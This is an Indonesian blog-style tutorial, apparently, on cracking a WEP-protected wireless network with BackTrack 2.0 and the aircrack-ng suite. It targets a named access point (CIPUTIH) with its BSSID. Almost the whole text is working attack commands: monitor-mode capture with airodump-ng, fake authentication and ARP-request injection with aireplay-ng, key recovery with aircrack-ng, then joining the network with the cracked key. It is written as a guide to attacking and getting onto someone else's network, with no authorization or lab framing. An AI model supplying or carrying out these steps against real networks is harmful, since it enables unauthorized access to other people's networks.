1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan meggunakan shell.Ketikkan:
Ifconfig rausb0
Iwconfig rausb0
2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoringdengan menggunakan shell ketikkan:
airodump-ng rausb0
3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid CIPUTIH bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah:
iwconfig rausb0 mode monitor channel 8
airodump-ng -- channel 8 --ivs -w namafile rausb0
shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng
4. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan:
Aireplay-ng -1 -30 -e CIPUTIH –a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0
Lakukan fake authentification sampai muncul balasan jawaban:Authentification successfulKeep live sending packetLakukan terus sampai mendapatkan key wep pada langkah aircrack-ng
5 Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command:
Aireplay-ng -3 –b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0
Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0
6. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan
aircrack-ng –e CIPUTIH -b 00:18:f8:36:83:47 (namafile).ivs
lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya.Tunggu sampai mendapat display
Key Found (B1:92:27:EF:6E) Probability 100%7. matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara:
iwconfig rausb0 mode managed –e CIPUTIH key B1:92:27:EF:6E
lalu lakukan otomatisasi dhcp dengan mengetikkan perintah:dhcpcd rausb0
lalu lakukan ping ke salah satu web site misalnya:ping yahoo.com
kalo jawaban dari ping TTL=bla bla berarti anda sudah terkoneksi ke internet
Untuk membobol wep 64 bit biasanya banyaknya paket yang dibutuhkan sekitar 250 ribu ivs lebih, untuk wep 128 bit 500 ribu atau lebih.
Posting Komentar